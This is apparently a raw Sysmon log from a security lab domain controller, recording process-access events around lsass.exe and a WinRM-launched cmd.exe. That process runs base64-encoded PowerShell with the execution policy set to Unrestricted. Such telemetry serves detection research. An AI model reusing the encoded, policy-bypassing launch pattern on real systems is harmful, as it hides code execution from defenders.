QQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA8-5FA1-9900-000000008801}5076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9900-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9900-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7CA7-5FA1-9100-000000008801}4804916C:\Windows\system32\WinrsHost.exe{D28789B6-7CA8-5FA1-9900-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.672{D28789B6-7CA8-5FA1-9900-000000008801}5076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CA7-5FA1-9100-000000008801}4804C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 